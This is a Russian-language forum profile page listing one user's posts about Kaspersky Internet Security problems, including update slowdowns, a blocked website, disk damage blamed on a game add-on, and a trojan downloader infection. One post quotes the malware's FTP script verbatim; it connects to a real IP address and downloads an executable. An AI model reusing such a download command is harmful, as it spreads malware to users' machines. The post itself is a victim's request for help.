Jump to content

РО

Members
  • Content Count

    86
  • Joined

  • Last visited

About РО

  • Rank
    Candidate
  1. Всё это время этим и занимался, процесс не быстрый, за это время кто-то мог бы и подсказать где хранится список запрещённых сайтов. Ссылка на отчёт http://gsi.kaspersky.fr/lire.php?hl=ru&amp...a6e4292eb54d6a4 sysinfo.zip
  2. Там про другую версию написано, как лог делать Да и маловероятно что дело в касперском, в защищённом режиме также на этот сайт зайти нельзя. Где-то в виндовсе адрес блокируется.
  3. Установил седьмой кис, обновление не работает - не конектится ни к одному серверу обновлений и на kaspersky.com нельзя зайти ни с одного броузера. Другие сайты работают. Система виндовс XP сервис пак3. Встроенный фаервол отключен, что ещё нужно сделать чтобы получить доступ к сайту и обновиться?
  4. А по другому распакованный дистр на CD записать нереально. После двух перезагрузок пришлось отключить.
  5. Как только распаковываю архив с дистром миллениума так файловый антивирус сразу сжирает всю скорость системы, даже отключить его нереал кроме как ресетом.
  6. У меня проблема с заходом на сайт freepascal.ru Шестой кис против этого адреса не возражает, а вот KIS 7.01.135 выдаёт в окнах всех броузеров следующее: ACCESS DENIED The requested URL could not be retrieved While trying to retrive the URL: http://freepascal.ru/ The folowing error was encountered: The requested object is forbidden. Generated Thu Jun 05 10:06:31 2008 by Kaspersky Internet Security 7.0 Можно как-то узнать, проблема в антивирусе или в коде сайта есть что-то неправильное?
  7. Не отвергается, но на операцию по изменению биоса я никому согласия не давал и давать не собираюсь - ни официальным ни неофициальным разработчикам. Так же как и на запись левой инфы в таблицу размещения файлов. Это крайне опасная и деструктивная операция. В первом мегабайте адресного пространства и так места давно не осталось, биосам по жизни нехватает несколько килобайт. Из-за этого половина биосов на официальных сайтах с задокументированными неисправностями. Некуда вставлять новые дрова, а количество устройств увеличивается. С огромным скрипом подобрал биос не занимающий адрес страничного кадра, впритирку присобачил. Даже не помню какие устройства пришлось отключить. Дык кто-то туда ещё что-то пихает без моего согласия :angry:
  8. Антивирус КИС6, оси на которых качалось и устанавливалось виндовс ХР с сервис пак 1 и без оной. Вообще-то обычно кис проверяет сегменты скачиваемых емулем файлов. Удалит сегмент, муль качает его по новой и так до перезагрузки качалки. Тогда можно снять с закачки такой файл. В этом случае антивирус ничего не обнаружил. Из чего я сделал вывод: или вредоносный код ему не известен, или является "вирусом в законе" - легальным лицензионным средством, "слегка глючащим". Хорошо владеющий ассемблером программист может выделить такой код из легальной программы и тиражировать трюк.
  9. Скачал через емуле добавку для стар варс батлегроунд - компанию клонов. После установки полетела файловая система на диске с этой игрой. Подумал может лицензионная информация неудачно в таблицу размещения файлов записалась. Переставил на пустой диск, конечно не заработала. Зато сдохли загрузочные винды на этом жёстком диске, потом на другом. Когда отфарматировал диск на котором стояла игра, решил перекинуть инфу из диска с виндой с другого харда. Вскоре винда свалилась в синий экран. Оказалось, на диске с работавшей виндовс вдруг остался лишь диск С, остальные пропали Под раздачу попал и линукс, его жалко больше всего. Загрузился с дискеты, программы с жёсткого диска не хотели ни запускаться ни копироваться. После переустановки биоса доступ к дискам нормализовался. У меня 2 вопроса. Реально ли вытащить из жёсткого диска с потерянными секторами информацию, или лучше сразу разбивать на разделы и форматировать. И не запретить ли антивирусу операции по изменению биоса? Для этого есть дос. Борьцы с пиратством разработали такие методы пометки системы по сравнению с которыми большинство вирусов отдыхает.
  10. Вот только что снова, свернул окно игры, а обратно не зайти. Звук - идут по кругу последние 2 ноты, по значку счёлкать бесполезно, торможение. Кис качает обновление, скачано 10%, общий размек 300 с копейками кило, скорость 0.02кб. Обычно на 10% и глючит при такой скоросити. Отключил обновление- глюки кончились.
  11. Ворд не проходит, он не на всех заражённых компах имеется, да и писать в нём простой текстовой файл нерентабельно. Щелчком файл тоже не открывался. Если предположить, что открытие происходит сторонней программой, то зачем сохранять синтаксис коммандного файла? Может он создаётся чем-то навроде интернет эксплорера или коммандной строкой?
  12. вот содержание файла i С небольшими вариациями встречал его и раньше: open 81.198.38.128 16921 user 1 1 get setup_57225.exe quit Просветите, как он без расширения запускается. Интересна технология После, в каталоге C:\ появляются короткие *.EXE файлы. В свойствах эксплорер показывает что они досовские. Если их удалить, после загрузки появятся вновь. Названия файлов на разных компах могут различаться, после перезагрузки появляются снова. Как временную меру поставил файлы с таким же названием и защитными атрибутами. Чтобы у вируса ошибка случилась. Раз к форуму не прикрепить, отправляю на newvirus@kaspersky.com с пометкой http://forum.kaspersky.com/index.php?showtopic=21865
  13. 1. По всему выходит что является. Когда качает на нормальной скорости, не тормозит. А вот килобайт 300 на мизерной скорости длительное время - страшные глюки. У меня триал KIS 6.0.0.300d.b.c.e 2. По виду батник, но без расширения. 3. А вы юмористы. Нереально прикрепить к сообщению ничего кроме картинок, даже в архивах. Возможно, контейнер и помог бы, но для извлечения полезной ирфы, всё равно понадобится какая-то технология. Куда слать архив? 4. Про антихакер забыл. Контроль целостности приложений у меня отключен. Но антихакер при запуске iexplore.exe выдаёт сообщение о его изменении и предлагает его запретить. Да, ИЕ изменяют все кому не лень, но юзерам он нравится. А тут кто-то нажмёт на кнопку запретить, и броузер никуда не приконектится. Как запретить антихакеру контроль изменения (не заражения) некоторых файлов?
  14. В 6 кис и кав наблюдается пожирание ресурсов процессора при обновлении со скоростью 0.01кб/с - за 90% цп. Если временно отключить обновление, торможение пропадает. На некоторых компах зверствует trоjan downloader, юзеры с "полезным софтом" устанавливают. В system32 появляется файл i с айпишкой, откуда потом качаются вирусы. Почему бы проактивке не отслеживать появления такого файла, а также досовских C:\*.exe при старте. Вроде несложная задача.
  15. При установке антивируса обновился до его полной установки. Предположительно в этот момент и подцепил вирусняк. Действует красиво. Постоянно выскакивает окошко с предложнием разрешить процесс svchost. Если это сделать, то помимо всего прочего этот процесс начинает немеряно жрать ресурс процессора. Если его отключить, может перезагрузиться комп. Проверка диска не помогла. Постоянно в system32 обнаруживаются заражённые файлы, причём часть из них явно левые и названия повторяются Можно его как-то выловить или автоматизировать кликанье по кнопке "запретить". А то он всё равно запустится если долго не нажимать.
×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.